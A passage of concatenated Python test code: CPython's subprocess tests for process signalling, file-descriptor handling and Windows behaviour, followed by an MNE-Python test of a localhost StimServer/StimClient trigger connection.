self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii')) def _kill_process(self, method, *args): # Do not inherit file handles from the parent. # It should fix failures on some platforms. # Also set the SIGINT handler to the default to make sure it's not # being ignored (some tests rely on that.) old_handler = signal.signal(signal.SIGINT, signal.default_int_handler) try: p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() time.sleep(30) """], close_fds=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) finally: signal.signal(signal.SIGINT, old_handler) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) getattr(p, method)(*args) return p @unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')), "Due to known OS bug (issue #16762)") def _kill_dead_process(self, method, *args): # Do not inherit file handles from the parent. # It should fix failures on some platforms. p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() """], close_fds=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) # The process should end after this time.sleep(1) # This shouldn't raise even though the child is now dead getattr(p, method)(*args) p.communicate() def test_send_signal(self): p = self._kill_process('send_signal', signal.SIGINT) _, stderr = p.communicate() self.assertIn(b'KeyboardInterrupt', stderr) self.assertNotEqual(p.wait(), 0) def test_kill(self): p = self._kill_process('kill') _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') self.assertEqual(p.wait(), -signal.SIGKILL) def test_terminate(self): p = self._kill_process('terminate') _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') self.assertEqual(p.wait(), -signal.SIGTERM) def test_send_signal_dead(self): # Sending a signal to a dead process self._kill_dead_process('send_signal', signal.SIGINT) def test_kill_dead(self): # Killing a dead process self._kill_dead_process('kill') def test_terminate_dead(self): # Terminating a dead process self._kill_dead_process('terminate') def _save_fds(self, save_fds): fds = [] for fd in save_fds: inheritable = os.get_inheritable(fd) saved = os.dup(fd) fds.append((fd, saved, inheritable)) return fds def _restore_fds(self, fds): for fd, saved, inheritable in fds: os.dup2(saved, fd, inheritable=inheritable) os.close(saved) def check_close_std_fds(self, fds): # Issue #9905: test that subprocess pipes still work properly with # some standard fds closed stdin = 0 saved_fds = self._save_fds(fds) for fd, saved, inheritable in saved_fds: if fd == 0: stdin = saved break try: for fd in fds: os.close(fd) out, err = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate() err = support.strip_python_stderr(err) self.assertEqual((out, err), (b'apple', b'orange')) finally: self._restore_fds(saved_fds) def test_close_fd_0(self): self.check_close_std_fds([0]) def test_close_fd_1(self): self.check_close_std_fds([1]) def test_close_fd_2(self): self.check_close_std_fds([2]) def test_close_fds_0_1(self): self.check_close_std_fds([0, 1]) def test_close_fds_0_2(self): self.check_close_std_fds([0, 2]) def test_close_fds_1_2(self): self.check_close_std_fds([1, 2]) def test_close_fds_0_1_2(self): # Issue #10806: test that subprocess pipes still work properly with # all standard fds closed. self.check_close_std_fds([0, 1, 2]) def test_small_errpipe_write_fd(self): """Issue #15798: Popen should work when stdio fds are available.""" new_stdin = os.dup(0) new_stdout = os.dup(1) try: os.close(0) os.close(1) # Side test: if errpipe_write fails to have its CLOEXEC # flag set this should cause the parent to think the exec # failed. Extremely unlikely: everyone supports CLOEXEC. subprocess.Popen([ sys.executable, "-c", "print('AssertionError:0:CLOEXEC failure.')"]).wait() finally: # Restore original stdin and stdout os.dup2(new_stdin, 0) os.dup2(new_stdout, 1) os.close(new_stdin) os.close(new_stdout) def test_remapping_std_fds(self): # open up some temporary files temps = [mkstemp() for i in range(3)] try: temp_fds = [fd for fd, fname in temps] # unlink the files -- we won't need to reopen them for fd, fname in temps: os.unlink(fname) # write some data to what will become stdin, and rewind os.write(temp_fds[1], b"STDIN") os.lseek(temp_fds[1], 0, 0) # move the standard file descriptors out of the way saved_fds = self._save_fds(range(3)) try: # duplicate the file objects over the standard fd's for fd, temp_fd in enumerate(temp_fds): os.dup2(temp_fd, fd) # now use those files in the "wrong" order, so that subprocess # has to rearrange them in the child p = subprocess.Popen([sys.executable, "-c", 'import sys; got = sys.stdin.read();' 'sys.stdout.write("got %s"%got); sys.stderr.write("err")'], stdin=temp_fds[1], stdout=temp_fds[2], stderr=temp_fds[0]) p.wait() finally: self._restore_fds(saved_fds) for fd in temp_fds: os.lseek(fd, 0, 0) out = os.read(temp_fds[2], 1024) err = support.strip_python_stderr(os.read(temp_fds[0], 1024)) self.assertEqual(out, b"got STDIN") self.assertEqual(err, b"err") finally: for fd in temp_fds: os.close(fd) def check_swap_fds(self, stdin_no, stdout_no, stderr_no): # open up some temporary files temps = [mkstemp() for i in range(3)] temp_fds = [fd for fd, fname in temps] try: # unlink the files -- we won't need to reopen them for fd, fname in temps: os.unlink(fname) # save a copy of the standard file descriptors saved_fds = self._save_fds(range(3)) try: # duplicate the temp files over the standard fd's 0, 1, 2 for fd, temp_fd in enumerate(temp_fds): os.dup2(temp_fd, fd) # write some data to what will become stdin, and rewind os.write(stdin_no, b"STDIN") os.lseek(stdin_no, 0, 0) # now use those files in the given order, so that subprocess # has to rearrange them in the child p = subprocess.Popen([sys.executable, "-c", 'import sys; got = sys.stdin.read();' 'sys.stdout.write("got %s"%got); sys.stderr.write("err")'], stdin=stdin_no, stdout=stdout_no, stderr=stderr_no) p.wait() for fd in temp_fds: os.lseek(fd, 0, 0) out = os.read(stdout_no, 1024) err = support.strip_python_stderr(os.read(stderr_no, 1024)) finally: self._restore_fds(saved_fds) self.assertEqual(out, b"got STDIN") self.assertEqual(err, b"err") finally: for fd in temp_fds: os.close(fd) # When duping fds, if there arises a situation where one of the fds is # either 0, 1 or 2, it is possible that it is overwritten (#12607). # This tests all combinations of this. def test_swap_fds(self): self.check_swap_fds(0, 1, 2) self.check_swap_fds(0, 2, 1) self.check_swap_fds(1, 0, 2) self.check_swap_fds(1, 2, 0) self.check_swap_fds(2, 0, 1) self.check_swap_fds(2, 1, 0) def test_surrogates_error_message(self): def prepare(): raise ValueError("surrogate:\uDCff") try: subprocess.call( [sys.executable, "-c", "pass"], preexec_fn=prepare) except ValueError as err: # Pure Python implementations keeps the message self.assertIsNone(subprocess._posixsubprocess) self.assertEqual(str(err), "surrogate:\uDCff") except subprocess.SubprocessError as err: # _posixsubprocess uses a default message self.assertIsNotNone(subprocess._posixsubprocess) self.assertEqual(str(err), "Exception occurred in preexec_fn.") else: self.fail("Expected ValueError or subprocess.SubprocessError") def test_undecodable_env(self): for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')): encoded_value = value.encode("ascii", "surrogateescape") # test str with surrogates script = "import os; print(ascii(os.getenv(%s)))" % repr(key) env = os.environ.copy() env[key] = value # Use C locale to get ASCII for the locale encoding to force # surrogate-escaping of \xFF in the child process; otherwise it can # be decoded as-is if the default locale is latin-1. env['LC_ALL'] = 'C' if sys.platform.startswith("aix"): # On AIX, the C locale uses the Latin1 encoding decoded_value = encoded_value.decode("latin1", "surrogateescape") else: # On other UNIXes, the C locale uses the ASCII encoding decoded_value = value stdout = subprocess.check_output( [sys.executable, "-c", script], env=env) stdout = stdout.rstrip(b'\n\r') self.assertEqual(stdout.decode('ascii'), ascii(decoded_value)) # test bytes key = key.encode("ascii", "surrogateescape") script = "import os; print(ascii(os.getenvb(%s)))" % repr(key) env = os.environ.copy() env[key] = encoded_value stdout = subprocess.check_output( [sys.executable, "-c", script], env=env) stdout = stdout.rstrip(b'\n\r') self.assertEqual(stdout.decode('ascii'), ascii(encoded_value)) def test_bytes_program(self): abs_program = os.fsencode(sys.executable) path, program = os.path.split(sys.executable) program = os.fsencode(program) # absolute bytes path exitcode = subprocess.call([abs_program, "-c", "pass"]) self.assertEqual(exitcode, 0) # absolute bytes path as a string cmd = b"'" + abs_program + b"' -c pass" exitcode = subprocess.call(cmd, shell=True) self.assertEqual(exitcode, 0) # bytes program, unicode PATH env = os.environ.copy() env["PATH"] = path exitcode = subprocess.call([program, "-c", "pass"], env=env) self.assertEqual(exitcode, 0) # bytes program, bytes PATH envb = os.environb.copy() envb[b"PATH"] = os.fsencode(path) exitcode = subprocess.call([program, "-c", "pass"], env=envb) self.assertEqual(exitcode, 0) def test_pipe_cloexec(self): sleeper = support.findfile("input_reader.py", subdir="subprocessdata") fd_status = support.findfile("fd_status.py", subdir="subprocessdata") p1 = subprocess.Popen([sys.executable, sleeper], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False) self.addCleanup(p1.communicate, b'') p2 = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=False) output, error = p2.communicate() result_fds = set(map(int, output.split(b','))) unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(), p1.stderr.fileno()]) self.assertFalse(result_fds & unwanted_fds, "Expected no fds from %r to be open in child, " "found %r" % (unwanted_fds, result_fds & unwanted_fds)) def test_pipe_cloexec_real_tools(self): qcat = support.findfile("qcat.py", subdir="subprocessdata") qgrep = support.findfile("qgrep.py", subdir="subprocessdata") subdata = b'zxcvbn' data = subdata * 4 + b'\n' p1 = subprocess.Popen([sys.executable, qcat], stdin=subprocess.PIPE, stdout=subprocess.PIPE, close_fds=False) p2 = subprocess.Popen([sys.executable, qgrep, subdata], stdin=p1.stdout, stdout=subprocess.PIPE, close_fds=False) self.addCleanup(p1.wait) self.addCleanup(p2.wait) def kill_p1(): try: p1.terminate() except ProcessLookupError: pass def kill_p2(): try: p2.terminate() except ProcessLookupError: pass self.addCleanup(kill_p1) self.addCleanup(kill_p2) p1.stdin.write(data) p1.stdin.close() readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10) self.assertTrue(readfiles, "The child hung") self.assertEqual(p2.stdout.read(), data) p1.stdout.close() p2.stdout.close() def test_close_fds(self): fd_status = support.findfile("fd_status.py", subdir="subprocessdata") fds = os.pipe() self.addCleanup(os.close, fds[0]) self.addCleanup(os.close, fds[1]) open_fds = set(fds) # add a bunch more fds for _ in range(9): fd = os.open(os.devnull, os.O_RDONLY) self.addCleanup(os.close, fd) open_fds.add(fd) for fd in open_fds: os.set_inheritable(fd, True) p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=False) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) self.assertEqual(remaining_fds & open_fds, open_fds, "Some fds were closed") p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=True) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) self.assertFalse(remaining_fds & open_fds, "Some fds were left open") self.assertIn(1, remaining_fds, "Subprocess failed") # Keep some of the fd's we opened open in the subprocess. # This tests _posixsubprocess.c's proper handling of fds_to_keep. fds_to_keep = set(open_fds.pop() for _ in range(8)) p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=True, pass_fds=()) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) self.assertFalse(remaining_fds & fds_to_keep & open_fds, "Some fds not in pass_fds were left open") self.assertIn(1, remaining_fds, "Subprocess failed") @unittest.skipIf(sys.platform.startswith("freebsd") and os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev, "Requires fdescfs mounted on /dev/fd on FreeBSD.") def test_close_fds_when_max_fd_is_lowered(self): """Confirm that issue21618 is fixed (may fail under valgrind).""" fd_status = support.findfile("fd_status.py", subdir="subprocessdata") # This launches the meat of the test in a child process to # avoid messing with the larger unittest processes maximum # number of file descriptors. # This process launches: # +--> Process that lowers its RLIMIT_NOFILE aftr setting up # a bunch of high open fds above the new lower rlimit. # Those are reported via stdout before launching a new # process with close_fds=False to run the actual test: # +--> The TEST: This one launches a fd_status.py # subprocess with close_fds=True so we can find out if # any of the fds above the lowered rlimit are still open. p = subprocess.Popen([sys.executable, '-c', textwrap.dedent( ''' import os, resource, subprocess, sys, textwrap open_fds = set() # Add a bunch more fds to pass down. for _ in range(40): fd = os.open(os.devnull, os.O_RDONLY) open_fds.add(fd) # Leave a two pairs of low ones available for use by the # internal child error pipe and the stdout pipe. # We also leave 10 more open as some Python buildbots run into # "too many open files" errors during the test if we do not. for fd in sorted(open_fds)[:14]: os.close(fd) open_fds.remove(fd) for fd in open_fds: #self.addCleanup(os.close, fd) os.set_inheritable(fd, True) max_fd_open = max(open_fds) # Communicate the open_fds to the parent unittest.TestCase process. print(','.join(map(str, sorted(open_fds)))) sys.stdout.flush() rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE) try: # 29 is lower than the highest fds we are leaving open. resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max)) # Launch a new Python interpreter with our low fd rlim_cur that # inherits open fds above that limit. It then uses subprocess # with close_fds=True to get a report of open fds in the child. # An explicit list of fds to check is passed to fd_status.py as # letting fd_status rely on its default logic would miss the # fds above rlim_cur as it normally only checks up to that limit. subprocess.Popen( [sys.executable, '-c', textwrap.dedent(""" import subprocess, sys subprocess.Popen([sys.executable, %r] + [str(x) for x in range({max_fd})], close_fds=True).wait() """.format(max_fd=max_fd_open+1))], close_fds=False).wait() finally: resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max)) ''' % fd_status)], stdout=subprocess.PIPE) output, unused_stderr = p.communicate() output_lines = output.splitlines() self.assertEqual(len(output_lines), 2, msg="expected exactly two lines of output:\n%r" % output) opened_fds = set(map(int, output_lines[0].strip().split(b','))) remaining_fds = set(map(int, output_lines[1].strip().split(b','))) self.assertFalse(remaining_fds & opened_fds, msg="Some fds were left open.") # Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file # descriptor of a pipe closed in the parent process is valid in the # child process according to fstat(), but the mode of the file # descriptor is invalid, and read or write raise an error. @support.requires_mac_ver(10, 5) def test_pass_fds(self): fd_status = support.findfile("fd_status.py", subdir="subprocessdata") open_fds = set() for x in range(5): fds = os.pipe() self.addCleanup(os.close, fds[0]) self.addCleanup(os.close, fds[1]) os.set_inheritable(fds[0], True) os.set_inheritable(fds[1], True) open_fds.update(fds) for fd in open_fds: p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=True, pass_fds=(fd, )) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) to_be_closed = open_fds - {fd} self.assertIn(fd, remaining_fds, "fd to be passed not passed") self.assertFalse(remaining_fds & to_be_closed, "fd to be closed passed") # pass_fds overrides close_fds with a warning. with self.assertWarns(RuntimeWarning) as context: self.assertFalse(subprocess.call( [sys.executable, "-c", "import sys; sys.exit(0)"], close_fds=False, pass_fds=(fd, ))) self.assertIn('overriding close_fds', str(context.warning)) def test_pass_fds_inheritable(self): script = support.findfile("fd_status.py", subdir="subprocessdata") inheritable, non_inheritable = os.pipe() self.addCleanup(os.close, inheritable) self.addCleanup(os.close, non_inheritable) os.set_inheritable(inheritable, True) os.set_inheritable(non_inheritable, False) pass_fds = (inheritable, non_inheritable) args = [sys.executable, script] args += list(map(str, pass_fds)) p = subprocess.Popen(args, stdout=subprocess.PIPE, close_fds=True, pass_fds=pass_fds) output, ignored = p.communicate() fds = set(map(int, output.split(b','))) # the inheritable file descriptor must be inherited, so its inheritable # flag must be set in the child process after fork() and before exec() self.assertEqual(fds, set(pass_fds), "output=%a" % output) # inheritable flag must not be changed in the parent process self.assertEqual(os.get_inheritable(inheritable), True) self.assertEqual(os.get_inheritable(non_inheritable), False) def test_stdout_stdin_are_single_inout_fd(self): with io.open(os.devnull, "r+") as inout: p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stdout=inout, stdin=inout) p.wait() def test_stdout_stderr_are_single_inout_fd(self): with io.open(os.devnull, "r+") as inout: p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stdout=inout, stderr=inout) p.wait() def test_stderr_stdin_are_single_inout_fd(self): with io.open(os.devnull, "r+") as inout: p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stderr=inout, stdin=inout) p.wait() def test_wait_when_sigchild_ignored(self): # NOTE: sigchild_ignore.py may not be an effective test on all OSes. sigchild_ignore = support.findfile("sigchild_ignore.py", subdir="subprocessdata") p = subprocess.Popen([sys.executable, sigchild_ignore], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = p.communicate() self.assertEqual(0, p.returncode, "sigchild_ignore.py exited" " non-zero with this error:\n%s" % stderr.decode('utf-8')) def test_select_unbuffered(self): # Issue #11459: bufsize=0 should really set the pipes as # unbuffered (and therefore let select() work properly). select = support.import_module("select") p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple")'], stdout=subprocess.PIPE, bufsize=0) f = p.stdout self.addCleanup(f.close) try: self.assertEqual(f.read(4), b"appl") self.assertIn(f, select.select([f], [], [], 0.0)[0]) finally: p.wait() def test_zombie_fast_process_del(self): # Issue #12650: on Unix, if Popen.__del__() was called before the # process exited, it wouldn't be added to subprocess._active, and would # remain a zombie. # spawn a Popen, and delete its reference before it exits p = subprocess.Popen([sys.executable, "-c", 'import sys, time;' 'time.sleep(0.2)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) ident = id(p) pid = p.pid del p # check that p is in the active processes list self.assertIn(ident, [id(o) for o in subprocess._active]) def test_leak_fast_process_del_killed(self): # Issue #12650: on Unix, if Popen.__del__() was called before the # process exited, and the process got killed by a signal, it would never # be removed from subprocess._active, which triggered a FD and memory # leak. # spawn a Popen, delete its reference and kill it p = subprocess.Popen([sys.executable, "-c", 'import time;' 'time.sleep(3)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) ident = id(p) pid = p.pid del p os.kill(pid, signal.SIGKILL) # check that p is in the active processes list self.assertIn(ident, [id(o) for o in subprocess._active]) # let some time for the process to exit, and create a new Popen: this # should trigger the wait() of p time.sleep(0.2) with self.assertRaises(OSError) as c: with subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc: pass # p should have been wait()ed on, and removed from the _active list self.assertRaises(OSError, os.waitpid, pid, 0) self.assertNotIn(ident, [id(o) for o in subprocess._active]) def test_close_fds_after_preexec(self): fd_status = support.findfile("fd_status.py", subdir="subprocessdata") # this FD is used as dup2() target by preexec_fn, and should be closed # in the child process fd = os.dup(1) self.addCleanup(os.close, fd) p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=True, preexec_fn=lambda: os.dup2(1, fd)) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) self.assertNotIn(fd, remaining_fds) @support.cpython_only def test_fork_exec(self): # Issue #22290: fork_exec() must not crash on memory allocation failure # or other errors import _posixsubprocess gc_enabled = gc.isenabled() try: # Use a preexec function and enable the garbage collector # to force fork_exec() to re-enable the garbage collector # on error. func = lambda: None gc.enable() executable_list = "exec" # error: must be a sequence for args, exe_list, cwd, env_list in ( (123, [b"exe"], None, [b"env"]), ([b"arg"], 123, None, [b"env"]), ([b"arg"], [b"exe"], 123, [b"env"]), ([b"arg"], [b"exe"], None, 123), ): with self.assertRaises(TypeError): _posixsubprocess.fork_exec( args, exe_list, True, [], cwd, env_list, -1, -1, -1, -1, 1, 2, 3, 4, True, True, func) finally: if not gc_enabled: gc.disable() @unittest.skipUnless(mswindows, "Windows specific tests") class Win32ProcessTestCase(BaseTestCase): def test_startupinfo(self): # startupinfo argument # We uses hardcoded constants, because we do not want to # depend on win32all. STARTF_USESHOWWINDOW = 1 SW_MAXIMIZE = 3 startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags = STARTF_USESHOWWINDOW startupinfo.wShowWindow = SW_MAXIMIZE # Since Python is a console process, it won't be affected # by wShowWindow, but the argument should be silently # ignored subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"], startupinfo=startupinfo) def test_creationflags(self): # creationflags argument CREATE_NEW_CONSOLE = 16 sys.stderr.write(" a DOS box should flash briefly ...\n") subprocess.call(sys.executable + ' -c "import time; time.sleep(0.25)"', creationflags=CREATE_NEW_CONSOLE) def test_invalid_args(self): # invalid arguments should raise ValueError self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], preexec_fn=lambda: 1) self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], stdout=subprocess.PIPE, close_fds=True) def test_close_fds(self): # close file descriptors rc = subprocess.call([sys.executable, "-c", "import sys; sys.exit(47)"], close_fds=True) self.assertEqual(rc, 47) def test_shell_sequence(self): # Run command through the shell (sequence) newenv = os.environ.copy() newenv["FRUIT"] = "physalis" p = subprocess.Popen(["set"], shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertIn(b"physalis", p.stdout.read()) def test_shell_string(self): # Run command through the shell (string) newenv = os.environ.copy() newenv["FRUIT"] = "physalis" p = subprocess.Popen("set", shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertIn(b"physalis", p.stdout.read()) def test_call_string(self): # call() function with string argument on Windows rc = subprocess.call(sys.executable + ' -c "import sys; sys.exit(47)"') self.assertEqual(rc, 47) def _kill_process(self, method, *args): # Some win32 buildbot raises EOFError if stdin is inherited p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() time.sleep(30) """], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) getattr(p, method)(*args) _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') returncode = p.wait() self.assertNotEqual(returncode, 0) def _kill_dead_process(self, method, *args): p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() sys.exit(42) """], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) # The process should end after this time.sleep(1) # This shouldn't raise even though the child is now dead getattr(p, method)(*args) _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') rc = p.wait() self.assertEqual(rc, 42) def test_send_signal(self): self._kill_process('send_signal', signal.SIGTERM) def test_kill(self): self._kill_process('kill') def test_terminate(self): self._kill_process('terminate') def test_send_signal_dead(self): self._kill_dead_process('send_signal', signal.SIGTERM) def test_kill_dead(self): self._kill_dead_process('kill') def test_terminate_dead(self): self._kill_dead_process('terminate') class CommandTests(unittest.TestCase): def test_getoutput(self): self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy') self.assertEqual(subprocess.getstatusoutput('echo xyzzy'), (0, 'xyzzy')) # we use mkdtemp in the next line to create an empty directory # under our exclusive control; from that, we can invent a pathname # that we _know_ won't exist. This is guaranteed to fail. dir = None try: dir = tempfile.mkdtemp() name = os.path.join(dir, "foo") status, output = subprocess.getstatusoutput( ("type " if mswindows else "cat ") + name) self.assertNotEqual(status, 0) finally: if dir is not None: os.rmdir(dir) @unittest.skipUnless(hasattr(selectors, 'PollSelector'), "Test needs selectors.PollSelector") class ProcessTestCaseNoPoll(ProcessTestCase): def setUp(self): self.orig_selector = subprocess._PopenSelector subprocess._PopenSelector = selectors.SelectSelector ProcessTestCase.setUp(self) def tearDown(self): subprocess._PopenSelector = self.orig_selector ProcessTestCase.tearDown(self) class HelperFunctionTests(unittest.TestCase): @unittest.skipIf(mswindows, "errno and EINTR make no sense on windows") def test_eintr_retry_call(self): record_calls = [] def fake_os_func(*args): record_calls.append(args) if len(record_calls) == 2: raise OSError(errno.EINTR, "fake interrupted system call") return tuple(reversed(args)) self.assertEqual((999, 256), subprocess._eintr_retry_call(fake_os_func, 256, 999)) self.assertEqual([(256, 999)], record_calls) # This time there will be an EINTR so it will loop once. self.assertEqual((666,), subprocess._eintr_retry_call(fake_os_func, 666)) self.assertEqual([(256, 999), (666,), (666,)], record_calls) @unittest.skipUnless(mswindows, "Windows-specific tests") class CommandsWithSpaces (BaseTestCase): def setUp(self): super().setUp() f, fname = mkstemp(".py", "te st") self.fname = fname.lower () os.write(f, b"import sys;" b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))" ) os.close(f) def tearDown(self): os.remove(self.fname) super().tearDown() def with_spaces(self, *args, **kwargs): kwargs['stdout'] = subprocess.PIPE p = subprocess.Popen(*args, **kwargs) self.addCleanup(p.stdout.close) self.assertEqual( p.stdout.read ().decode("mbcs"), "2 [%r, 'ab cd']" % self.fname ) def test_shell_string_with_spaces(self): # call() function with string argument with spaces on Windows self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname, "ab cd"), shell=1) def test_shell_sequence_with_spaces(self): # call() function with sequence argument with spaces on Windows self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1) def test_noshell_string_with_spaces(self): # call() function with string argument with spaces on Windows self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname, "ab cd")) def test_noshell_sequence_with_spaces(self): # call() function with sequence argument with spaces on Windows self.with_spaces([sys.executable, self.fname, "ab cd"]) class ContextManagerTests(BaseTestCase): def test_pipe(self): with subprocess.Popen([sys.executable, "-c", "import sys;" "sys.stdout.write('stdout');" "sys.stderr.write('stderr');"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc: self.assertEqual(proc.stdout.read(), b"stdout") self.assertStderrEqual(proc.stderr.read(), b"stderr") self.assertTrue(proc.stdout.closed) self.assertTrue(proc.stderr.closed) def test_returncode(self): with subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(100)"]) as proc: pass # __exit__ calls wait(), so the returncode should be set self.assertEqual(proc.returncode, 100) def test_communicate_stdin(self): with subprocess.Popen([sys.executable, "-c", "import sys;" "sys.exit(sys.stdin.read() == 'context')"], stdin=subprocess.PIPE) as proc: proc.communicate(b"context") self.assertEqual(proc.returncode, 1) def test_invalid_args(self): with self.assertRaises(FileNotFoundError) as c: with subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc: pass def test_broken_pipe_cleanup(self): """Broken pipe error should not prevent wait() (Issue 21619)""" proc = subprocess.Popen([sys.executable, '-c', 'pass'], stdin=subprocess.PIPE, bufsize=support.PIPE_MAX_SIZE*2) proc = proc.__enter__() # Prepare to send enough data to overflow any OS pipe buffering and # guarantee a broken pipe error. Data is held in BufferedWriter # buffer until closed. proc.stdin.write(b'x' * support.PIPE_MAX_SIZE) self.assertIsNone(proc.returncode) # EPIPE expected under POSIX; EINVAL under Windows self.assertRaises(OSError, proc.__exit__, None, None, None) self.assertEqual(proc.returncode, 0) self.assertTrue(proc.stdin.closed) def test_main(): unit_tests = (ProcessTestCase, POSIXProcessTestCase, Win32ProcessTestCase, CommandTests, ProcessTestCaseNoPoll, HelperFunctionTests, CommandsWithSpaces, ContextManagerTests, ) support.run_unittest(*unit_tests) support.reap_children() if __name__ == "__main__": unittest.main()
test_stim_client_server.py
import threading import time import pytest from mne.realtime import StimServer, StimClient from mne.externals.six.moves import queue from mne.utils import requires_good_network, run_tests_if_main _server = None _have_put_in_trigger = False _max_wait = 10. @requires_good_network def test_connection(): """Test TCP/IP connection for StimServer <-> StimClient.""" global _server, _have_put_in_trigger # have to start a thread to simulate the effect of two # different computers since stim_server.start() is designed to # be a blocking method # use separate queues because timing matters trig_queue1 = queue.Queue() trig_queue2 = queue.Queue() # start a thread to emulate 1st client thread1 = threading.Thread(target=_connect_client, args=(trig_queue1,)) thread1.daemon = True # start another thread to emulate 2nd client thread2 = threading.Thread(target=_connect_client, args=(trig_queue2,)) thread2.daemon = True thread1.start() thread2.start() with StimServer(port=4218, n_clients=2) as stim_server: _server = stim_server stim_server.start(timeout=10.0) # don't allow test to hang # Add the trigger to the queue for both clients stim_server.add_trigger(20) _have_put_in_trigger = True # monkey patch # the assert_equal must be in the test_connection() method # Hence communication between threads is necessary trig1 = trig_queue1.get(timeout=_max_wait) trig2 = trig_queue2.get(timeout=_max_wait) assert trig1 == 20 # test if both clients receive the same trigger assert trig1 == trig2 # test timeout for stim_server with StimServer(port=4218) as stim_server: pytest.raises(StopIteration, stim_server.start, 0.1) def _connect_client(trig_queue): """Instantiate the StimClient.""" # just wait till the main thread reaches stim_server.start() t0 = time.time() while (time.time() - t0 < _max_wait and (_server is None or not _server._running)): time.sleep(0.01) assert _server is not None and _server._running # instantiate StimClient stim_client = StimClient('localhost', port=4218) # wait for script to reach stim_server.add_trigger() t0 = time.time() while (time.time() - t0 < _max_wait and not _have_put_in_trigger): time.sleep(0.01) assert _have_put_in_trigger trig_queue.put(stim_client.get_trigger()) stim_client.close() run_tests_if_main()
test_fx.py
